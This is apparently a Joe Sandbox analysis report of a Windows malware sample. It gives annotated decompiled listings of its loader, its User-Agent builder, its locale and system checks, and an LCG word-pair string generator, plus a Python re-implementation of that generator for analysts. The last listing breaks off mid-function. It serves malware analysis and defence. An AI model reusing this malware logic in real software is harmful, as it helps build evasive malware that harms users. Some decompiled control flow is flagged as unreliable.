          				CHAR* _t68;
          				CHAR* _t69;
          				char* _t70;
          				void* _t71;
          
          				_t62 = __edx;
          				_v20 = 0;
          				_v8 = 0;
          				_v12 = 0;
          				_t21 = E005E4520(); // GetModuleHandleA with the inline bytes 0x4C44544E = "NTDL" (subcall list below)
          				if(_t21 != 0) {
          					_t60 =  *0x5ea2fc; // 0x2000000a  low byte 0x0a = Windows major version 10 in this run
          					_t56 = (_t60 & 0xf0000000) + _t21;
          					 *0x5ea2fc = (_t60 & 0xf0000000) + _t21; // keep the top nibble, store the E005E4520 result below it
          				}
          				_t22 =  *0x5ea178(0, 2); // executed
          				_v16 = _t22;
          				// accepted results 0, 1 and 0x80010106 are S_OK, S_FALSE and RPC_E_CHANGED_MODE, the
          				// return values of CoInitializeEx(NULL, COINIT_APARTMENTTHREADED = 2); the report does
          				// not resolve this import, so that reading is an inference from the constants
          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
          					_t25 = E005E3037( &_v8,  &_v20); // executed
          					_t55 = _t25;
          					_t26 =  *0x5ea348; // 0x25dd5a8  base used to address the module's string constants
          					// major version > 5 (Vista and later) selects the string beginning "S:(M",
          					// older systems the one beginning "D:(D" (decoded from the dwords; they look like
          					// the start of SDDL security descriptor strings)
          					if( *0x5ea2fc > 5) {
          						_t8 = _t26 + 0x5eb51d; // 0x4d283a53 = "S:(M"
          						_t27 = _t8;
          					} else {
          						_t7 = _t26 + 0x5eb9db; // 0x44283a44 = "D:(D"
          						_t27 = _t7;
          					}
          					E005E4332(_t27, _t27);
          					_t31 = E005E415A(_t62,  &_v20,  &_v12); // executed
          					if(_t31 == 0) {
          						CloseHandle(_v20);
          					}
          					_t64 = 5; // ERROR_ACCESS_DENIED
          					if(_t55 != _t64) {
          						_t32 = E005E27A0(); // GetVersionExA + wsprintfA (subcall list below)
          						 *0x5ea310 =  *0x5ea310 ^ 0x81bbe65d;
          						 *0x5ea36c = _t32;
          						_t33 = E005E33DC(0x60); // RtlAllocateHeap: the global context
          						 *0x5ea3cc = _t33;
          						__eflags = _t33;
          						if(_t33 == 0) {
          							_push(8); // push 8 / pop eax: ERROR_NOT_ENOUGH_MEMORY
          							_pop(0);
          						} else {
          							memset(_t33, 0, 0x60);
          							_t50 =  *0x5ea3cc; // 0x2bc9600
          							_t71 = _t71 + 0xc;
          							__imp__(_t50 + 0x40); // RtlInitializeCriticalSection on the lock at +0x40 (APIs list below)
          							_t52 =  *0x5ea3cc; // 0x2bc9600
          							 *_t52 = 0x5eb142;
          						}
          						_t55 = 0;
          						__eflags = 0;
          						if(0 == 0) {
          							_t37 = RtlAllocateHeap( *0x5ea2d8, 0, 0x43); // 0x43-byte buffer for the User-Agent string
          							 *0x5ea368 = _t37;
          							__eflags = _t37;
          							if(_t37 == 0) {
          								_push(8);
          								_pop(0);
          							} else {
          								_t57 =  *0x5ea2fc; // 0x2000000a
          								_t62 = _t57 & 0x000000ff; // Windows major version byte
          								_t59 =  *0x5ea348; // 0x25dd5a8
          								_t13 = _t59 + 0x5eb74a; // 0x697a6f4d = "Mozi": the "Mozilla/..." format string
          								_t56 = _t13;
          								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x5e927b);
          							}
          							_t55 = 0;
          							__eflags = 0;
          							if(0 == 0) {
          								asm("sbb eax, eax");
          								E005E3BD3( ~_v8 &  *0x5ea310, 0x5ea00c); // executed
          								_t43 = E005E1D8A(0, _t56, _t62, _t64, 0x5ea00c); // executed
          								_t55 = _t43;
          								__eflags = _t55;
          								if(_t55 != 0) {
          									goto L30;
          								}
          								_t44 = E005E6EA3(_t62); // executed
          								__eflags = _t44;
          								if(_t44 != 0) {
          									__eflags = _v8;
          									_t68 = _v12;
          									if(_v8 != 0) {
          										L29:
          										_t45 = E005E6815(_t62, _t68, _v8); // executed
          										_t55 = _t45;
          										goto L30;
          									}
          									__eflags = _t68;
          									if(__eflags == 0) {
          										goto L30;
          									}
          									_t55 = E005E5C31(__eflags,  &(_t68[4])); // memset / lstrlenW / StrCmpNIW (subcall list below)
          									__eflags = _t55;
          									if(_t55 == 0) {
          										goto L30;
          									}
          									goto L29;
          								}
          								_t55 = 8; // ERROR_NOT_ENOUGH_MEMORY
          							}
          						}
          					} else {
          						// E005E3037 returned ERROR_ACCESS_DENIED (5)
          						_t69 = _v12;
          						if(_t69 == 0) {
          							L30:
          							// only undone when the 0x5ea178 call returned 0 or 1, i.e. when it actually
          							// initialised (CoUninitialize, under the CoInitializeEx reading above)
          							if(_v16 == 0 || _v16 == 1) {
          								 *0x5ea17c();
          							}
          							goto L34;
          						}
          						_t70 =  &(_t69[4]);
          						do {
          						} while (E005E23C4(_t64, _t70, 0, 1) == 0x4c7); // 0x4c7 = ERROR_CANCELLED: retry while cancelled
          					}
          					goto L30;
          				} else {
          					_t55 = _t22; // initialisation failed: propagate its HRESULT
          					L34:
          					return _t55;
          				}
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x005e2523 .. 0x005e2707; entries of 0x00000000 are lines without a resolved address.

          APIs
            • Part of subcall function 005E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,005E253B,00000001), ref: 005E452F
          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 005E25B8
            • Part of subcall function 005E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 005E27C4
            • Part of subcall function 005E27A0: wsprintfA.USER32 ref: 005E2828
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • memset.NTDLL ref: 005E2612
          • RtlInitializeCriticalSection.NTDLL(02BC95C0), ref: 005E2623
            • Part of subcall function 005E5C31: memset.NTDLL ref: 005E5C4B
            • Part of subcall function 005E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E5C91
            • Part of subcall function 005E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 005E5C9C
          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 005E264E
          • wsprintfA.USER32 ref: 005E267E
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
          • String ID:
          • API String ID: 1825273115-0
          • Opcode ID: 2bb551caab567597024eaf8929a4495b904f581d97ffbf1c84e8b1cf4a74fc6d
          • Instruction ID: f4af4bcd784e2e5ab66b082e2b1a2f92b0940d321477351ead513a882422d632
          • Opcode Fuzzy Hash: 2bb551caab567597024eaf8929a4495b904f581d97ffbf1c84e8b1cf4a74fc6d
          • Instruction Fuzzy Hash: 1E511A71A002D5ABDB1CDBB2DDC9B6E3FACBB68700F100816F1C2EB155DB70AA449B51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E005E7040(signed int __eax, signed int _a4, signed int _a8) {
          				// String-pair generator. __eax = PRNG seed, _a4 = CR/LF-separated word list
          				// (modified in place), _a8 = its length. Pass 1 splits the list into words and
          				// upper-cases the first letter of each; pass 2 emits word-count strings, each the
          				// concatenation of two words chosen by a linear congruential generator with
          				// multiplier 0x19660d and increment 0x3c6ef35f (the Numerical Recipes constants).
          				// The unresolved __imp__ calls are lstrcpy, lstrcat, lstrcmp and lstrlen (APIs list
          				// below). The result table is stored at 0x5ea318.
          				signed int _v8;   // pass 1: longest word seen; pass 2: output loop counter
          				signed int _v12;  // pass 2: index for the duplicate scan
          				intOrPtr _v16;    // word pointer table
          				signed int _v20;  // PRNG state
          				intOrPtr _t81;
          				char _t83;
          				signed int _t90;
          				signed int _t97;
          				signed int _t99;
          				char _t101;
          				unsigned int _t102;
          				intOrPtr _t103;
          				char* _t107;
          				signed int _t110;
          				signed int _t113;
          				signed int _t118;
          				signed int _t122;
          				intOrPtr _t124;
          
          				_t102 = _a8;
          				_t118 = 0;                      // length of the word in progress
          				_v20 = __eax;
          				_t122 = (_t102 >> 2) + 1;       // capacity of the word pointer table
          				_v8 = 0;
          				_a8 = 0;                        // reused as the word count
          				_t81 = E005E33DC(_t122 << 2);   // RtlAllocateHeap for the pointer table
          				_v16 = _t81;
          				if(_t81 == 0) {
          					_push(8); // push 8 / pop eax: ERROR_NOT_ENOUGH_MEMORY
          					_pop(0);
          					L37:
          					return 0;
          				}
          				_t107 = _a4;
          				_a4 = _t102;                    // reused as the remaining byte count
          				_t113 = 0;                      // words started so far
          				while(1) {
          					_t83 =  *_t107;
          					if(_t83 == 0) {
          						break;
          					}
          					if(_t83 == 0xd || _t83 == 0xa) {   // CR or LF ends a word
          						if(_t118 != 0) {
          							if(_t118 > _v8) {
          								_v8 = _t118;
          							}
          							_a8 = _a8 + 1;
          							_t118 = 0;
          						}
          						 *_t107 = 0;                // NUL-terminate in place
          						goto L16;
          					} else {
          						if(_t118 != 0) {
          							L10:
          							_t118 = _t118 + 1;
          							L16:
          							_t107 = _t107 + 1;
          							_t15 =  &_a4;
          							 *_t15 = _a4 - 1;
          							if( *_t15 != 0) {
          								continue;
          							}
          							break;
          						}
          						if(_t113 == _t122) {       // pointer table full: go straight to pass 2
          							L21:
          							if(_a8 <= 0x20) {      // 0x20 words or fewer: fail
          								_push(0xb);        // ERROR_BAD_FORMAT
          								L34:
          								_pop(0);
          								L35:
          								E005E61DA(_v16);   // free the pointer table
          								goto L37;
          							}
          							_t24 = _v8 + 5; // 0xcdd8d2f8
          							// output block: _a8 pointer slots followed by string storage sized for
          							// (2 * longest word + 5) bytes per entry
          							_t103 = E005E33DC((_v8 + _t24) * _a8 + 4);
          							if(_t103 == 0) {
          								_push(8);
          								goto L34;
          							}
          							_t90 = _a8;
          							_a4 = _a4 & 0x00000000;    // reused as the output count
          							_v8 = _v8 & 0x00000000;    // reused as the loop counter
          							_t124 = _t103 + _t90 * 4;  // first string slot, after the pointer table
          							if(_t90 <= 0) {
          								L31:
          								 *0x5ea318 = _t103;
          								goto L35;
          							}
          							do {
          								// two LCG steps per output: the first picks word A, the second picks word B
          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4))); // lstrcpy(slot, words[r1 % count])
          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));  // lstrcat(slot, words[r2 % count])
          								_v12 = _v12 & 0x00000000;
          								if(_a4 <= 0) {
          									goto L30;
          								} else {
          									goto L26;
          								}
          								while(1) {
          									L26:
          									_t99 = _v12;
          									// lstrcmp(out[i], slot): the break is taken on a zero (equal) result,
          									// which the decompiler renders as a test of _t99
          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
          									if(_t99 == 0) {
          										break;
          									}
          									_v12 = _v12 + 1;
          									if(_v12 < _a4) {
          										continue;
          									}
          									goto L30;
          								}
          								_v8 = _v8 - 1;             // duplicate found: counter decremented (the decompiled
          								                           // control flow on this path is unreliable, quality 22%)
          								L30:
          								_t97 = _a4;
          								_a4 = _a4 + 1;
          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124; // record the pointer to the new string
          								__imp__(_t124);                            // lstrlen(slot)
          								_v8 = _v8 + 1;
          								_t124 = _t124 + _t97 + 1;  // advance past the string; the decompiler shows _t97 where the lstrlen result is used
          							} while (_v8 < _a8);
          							goto L31;
          						}
          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107; // record the start of a new word
          						_t101 = _t83;
          						if(_t83 - 0x61 <= 0x19) {  // 'a'..'z'
          							_t101 = _t101 - 0x20;  // to upper case
          						}
          						 *_t107 = _t101;
          						_t113 = _t113 + 1;
          						goto L10;
          					}
          				}
          				if(_t118 != 0) {                 // trailing word without CR/LF
          					if(_t118 > _v8) {
          						_v8 = _t118;
          					}
          					_a8 = _a8 + 1;
          				}
          				goto L21;
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x005e7047 .. 0x005e71ca; entries of 0x00000000 are lines without a resolved address.

          APIs
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • lstrcpy.KERNEL32(43175AC4,00000020), ref: 005E713D
          • lstrcat.KERNEL32(43175AC4,00000020), ref: 005E7152
          • lstrcmp.KERNEL32(00000000,43175AC4), ref: 005E7169
          • lstrlen.KERNEL32(43175AC4), ref: 005E718D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
          • String ID:
          • API String ID: 3214092121-3916222277
          • Opcode ID: 42ed2079dbea38f61ad4f0fda1ce2f99244534697297473aa78dca4c4970e407
          • Instruction ID: b8782bcfb9b28c52d0932bd3e091ef5f722ba04323f580f57982375b9f1384a5
          • Opcode Fuzzy Hash: 42ed2079dbea38f61ad4f0fda1ce2f99244534697297473aa78dca4c4970e407
          • Instruction Fuzzy Hash: 8E51C371A0424CEFDF19DF9AC8886ADBFB6FF59350F14805AE8959B201C7709A01CF90
          Uniqueness

          Uniqueness Score: -1.00%
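The following is an added example, not code from the sample or from the Joe Sandbox report: a Python re-implementation of the generator decompiled above as E005E7040, written so an analyst can reproduce the strings from a recovered word list and seed. It follows the listing (CR/LF tokenizer with in-place NUL termination, first-letter upper-casing, the (len >> 2) + 1 pointer-table cap, the ERROR_BAD_FORMAT failure at 0x20 words or fewer, two LCG steps per output with multiplier 0x19660d and increment 0x3c6ef35f, lstrcpy + lstrcat of the two selected words). Two things are assumptions: the decompiled duplicate path is ambiguous, so a pair that lstrcmp finds already in the output is regenerated here; and the word list at the end is a constructed sample, not data from the report.

```python
from typing import List

LCG_A = 0x19660D      # multiplier in the listing (Numerical Recipes LCG constants)
LCG_C = 0x3C6EF35F    # increment
MASK32 = 0xFFFFFFFF   # the sample works in 32-bit registers
MIN_WORDS = 0x20      # the listing fails with ERROR_BAD_FORMAT (0xb) at <= 0x20 words


def lcg_step(state: int) -> int:
    """One generator step: state * 0x19660D + 0x3C6EF35F mod 2^32."""
    return (state * LCG_A + LCG_C) & MASK32


def tokenize(wordlist: bytes) -> List[str]:
    """Pass 1 of E005E7040.

    Splits on CR or LF (the sample NUL-terminates words in place), upper-cases the
    first byte of a word when it is 'a'..'z', stops at a NUL byte, and stops starting
    new words once the pointer table of (len >> 2) + 1 entries is full.
    """
    max_words = (len(wordlist) >> 2) + 1
    words: List[str] = []
    cur: List[str] = []
    for b in wordlist:
        if b == 0:
            break
        if b in (0x0D, 0x0A):
            if cur:
                words.append("".join(cur))
                cur = []
            continue
        if not cur:                        # first byte of a new word
            if len(words) == max_words:    # pointer table full: stop tokenizing
                break
            if 0x61 <= b <= 0x7A:          # 'a'..'z': subtract 0x20
                b -= 0x20
        cur.append(chr(b))
    if cur:                                # trailing word without CR/LF
        words.append("".join(cur))
    return words


def generate(words: List[str], seed: int, count: int = 0) -> List[str]:
    """Pass 2 of E005E7040: `count` (default: the word count, as in the listing)
    strings, each the concatenation of two words picked by consecutive LCG outputs
    taken modulo the word count."""
    n = len(words)
    if n <= MIN_WORDS:
        raise ValueError("ERROR_BAD_FORMAT: the sample requires more than 0x20 words")
    count = count or n
    state = seed & MASK32
    out: List[str] = []
    seen = set()
    while len(out) < count:
        r1 = lcg_step(state)       # first output selects word A
        state = lcg_step(r1)       # second output selects word B and becomes the new state
        candidate = words[r1 % n] + words[state % n]
        if candidate in seen:      # assumption: a duplicate (lstrcmp == 0) is regenerated
            continue
        seen.add(candidate)
        out.append(candidate)
    return out


def generate_from_wordlist(wordlist: bytes, seed: int) -> List[str]:
    """Raw CR/LF word list in, generated strings out."""
    return generate(tokenize(wordlist), seed)


# Constructed sample input (not from the sample): 40 lowercase words, CR/LF separated.
SAMPLE_WORDLIST = b"\r\n".join(b"word%d" % i for i in range(40)) + b"\r\n"

if __name__ == "__main__":
    for s in generate_from_wordlist(SAMPLE_WORDLIST, seed=0):
        print(s)
```

With seed 0 the first LCG output is 0x3C6EF35F, which selects word index 23 of the 40 sample words, and the second output 0x47502932 selects index 2, so the first generated string is "Word23Word2"; feeding the real word list and the seed the sample passes in __eax reproduces its output in the same way.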

          C-Code - Quality: 100%
          			_entry_() {
          				// Loader entry point of the 0x400000 image (the outer executable, not the
          				// unpacked 0x5e0000 module the other listings come from).
          				void* _t1;
          				int _t4;
          				int _t6;
          
          				_t6 = 0;
          				_t1 = HeapCreate(0, 0x400000, 0); // executed  private 4 MiB heap, growable (dwMaximumSize = 0)
          				 *0x404160 = _t1;
          				if(_t1 != 0) {
          					 *0x404170 = GetModuleHandleA(0); // own image base
          					GetCommandLineW(); // executed  result not used here
          					// E004019F1 (subcall list below): NtQuerySystemInformation(8 = SystemProcessorPerformanceInformation),
          					// Sleep, GetLocaleInfoA(0x400 = LOCALE_USER_DEFAULT, 0x5a = LOCALE_SISO3166CTRYNAME),
          					// GetSystemDefaultUILanguage, VerLanguageNameA and GetLongPathNameW: the system-information
          					// and locale checks flagged in the Signatures section
          					_t4 = E004019F1(); // executed
          					_t6 = _t4;
          					HeapDestroy( *0x404160);
          				}
          				ExitProcess(_t6); // the E004019F1 result becomes the process exit code
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x00401de2 .. 0x00401e20.

          APIs
          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
          • GetCommandLineW.KERNEL32 ref: 00401E06
            • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
            • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
          • HeapDestroy.KERNEL32 ref: 00401E19
          • ExitProcess.KERNEL32 ref: 00401E20
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
          • String ID:
          • API String ID: 1863574965-0
          • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
          • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005C024D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID: cess$kernel32.dll
          • API String ID: 4275171209-1230238691
          • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
          • Instruction ID: 3c435322ba15a64dfb8888bff5033413b305ca36898837a74b38d840fb54a547
          • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
          • Instruction Fuzzy Hash: 46C1AAB5D00228EFDF60CFA8D985BADBBB5BF08304F108099E54CA7252DB319A94DF11
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E5251(void* __edx) {
          				// Reads a string value through E005E33F1, parses it with StrToIntExW and, when it
          				// is 8 or more, performs two E005E5157 lookups (the second only on Windows 8.1 or
          				// earlier) before E005E5B0E is called with HKEY_CURRENT_USER. String constants
          				// are decoded below from the dword values the decompiler shows.
          				void* _v8;
          				int _v12;
          				WCHAR* _v16;
          				void* __edi;
          				void* __esi;
          				void* _t23;
          				intOrPtr _t24;
          				void* _t26;
          				intOrPtr _t32;
          				intOrPtr _t35;
          				intOrPtr _t38;
          				intOrPtr _t42;
          				void* _t45;
          				void* _t50;
          				void* _t52;
          
          				_t50 = __edx;
          				_v12 = 0;
          				_t23 = E005E6ADC(0,  &_v8); // executed  obtains the handle in _v8 that E005E7220 releases at the end
          				if(_t23 != 0) {
          					_v8 = 0;
          				}
          				_t24 =  *0x5ea348; // 0x25dd5a8  base used to address the module's string constants
          				_t4 = _t24 + 0x5ebc70; // 0x2bc9218
          				_t5 = _t24 + 0x5ebb60; // 0x4f0053 = UTF-16 "SO..."
          				_t26 = E005E33F1( &_v16, _v8, _t5, _t4); // executed  returns the value as a wide string in _v16
          				_t45 = _t26;
          				if(_t45 == 0) {
          					StrToIntExW(_v16, 0,  &_v12); // dwFlags 0 = STIF_DEFAULT: decimal parse into _v12
          					_t45 = 8;
          					if(_v12 < _t45) {              // value below 8: return 1
          						_t45 = 1;
          						__eflags = 1;
          					} else {
          						_t32 =  *0x5ea348; // 0x25dd5a8
          						_t11 = _t32 + 0x5ebcc8; // 0x2bc9270
          						_t48 = _t11;
          						_t12 = _t32 + 0x5ebb60; // 0x4f0053
          						_t52 = E005E5DE4(_t11, _t12, _t11);
          						_t59 = _t52;
          						if(_t52 != 0) {
          							_t35 =  *0x5ea348; // 0x25dd5a8
          							_t13 = _t35 + 0x5ebcf0; // 0x30314549 = "IE10"
          							if(E005E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
          								_t61 =  *0x5ea2fc - 6;
          								if( *0x5ea2fc <= 6) {  // Windows major version 6 or lower (8.1 and earlier)
          									_t42 =  *0x5ea348; // 0x25dd5a8
          									_t15 = _t42 + 0x5ebcd2; // 0x52384549 = "IE8R"
          									E005E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
          								}
          							}
          							_t38 =  *0x5ea348; // 0x25dd5a8
          							_t17 = _t38 + 0x5ebbb8; // 0x2bc9160
          							_t18 = _t38 + 0x5ebc1c; // 0x680043 = UTF-16 "Ch..."
          							_t45 = E005E5B0E(_v8, 0x80000001, _t52, _t18, _t17); // 0x80000001 = HKEY_CURRENT_USER
          							HeapFree( *0x5ea2d8, 0, _t52);
          						}
          					}
          					HeapFree( *0x5ea2d8, 0, _v16);
          				}
          				_t54 = _v8;
          				if(_v8 != 0) {
          					E005E7220(_t54);
          				}
          				return _t45;
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x005e5251 .. 0x005e5363.

          APIs
          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BC9218,00000000,?,7476F710,00000000,7476F730), ref: 005E52A0
          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BC9160,?,00000000,30314549,00000014,004F0053,02BC9270), ref: 005E533D
          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E68B6), ref: 005E534F
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SysAllocString.OLEAUT32(80000002), ref: 005E43B5
          • SysAllocString.OLEAUT32(005E4D42), ref: 005E43F9
          • SysFreeString.OLEAUT32(00000000), ref: 005E440D
          • SysFreeString.OLEAUT32(00000000), ref: 005E441B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree
          • String ID:
          • API String ID: 344208780-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 65%
          			E005E213E(void* __ecx, intOrPtr _a4) {
          				struct _FILETIME _v12;
          				int _t13;
          				signed int _t16;
          				void* _t17;
          				signed int _t18;
          				unsigned int _t22;
          				void* _t30;
          				signed int _t34;
          
          				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
          				asm("stosd");
          				do {
          					_t13 = SwitchToThread();
          					GetSystemTimeAsFileTime( &_v12);
          					_t22 = _v12.dwHighDateTime;
          					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
          					_push(0);
          					_push(0x13);
          					_push(_t22 >> 5);
          					_push(_t16);
          					L005E8436();
          					_t34 = _t16 + _t13;
          					_t17 = E005E6269(_a4, _t34);
          					_t30 = _t17;
          					_t18 = 3;
          					Sleep(_t18 << (_t34 & 0x00000007)); // executed
          				} while (_t30 == 1);
          				return _t30;
          			}

          APIs
          • SwitchToThread.KERNEL32(?,00000001,?,?,?,005E5044,?,?), ref: 005E214F
          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,005E5044,?,?), ref: 005E215B
          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 005E2174
            • Part of subcall function 005E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 005E6308
          • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,005E5044,?,?), ref: 005E2193
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
          • String ID:
          • API String ID: 1610602887-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 87%
          			E004014CF(void* __eax, void* _a4) {
          				signed int _v8;
          				signed int _v12;
          				signed int _v16;
          				long _v20;
          				int _t42;
          				long _t53;
          				intOrPtr _t56;
          				void* _t57;
          				signed int _t59;
          
          				_v12 = _v12 & 0x00000000;
          				_t56 =  *0x404180;
          				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
          				_v16 =  *(__eax + 6) & 0x0000ffff;
          				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
          				_v8 = _v8 & 0x00000000;
          				if(_v16 <= 0) {
          					L12:
          					return _v12;
          				} else {
          					goto L1;
          				}
          				while(1) {
          					L1:
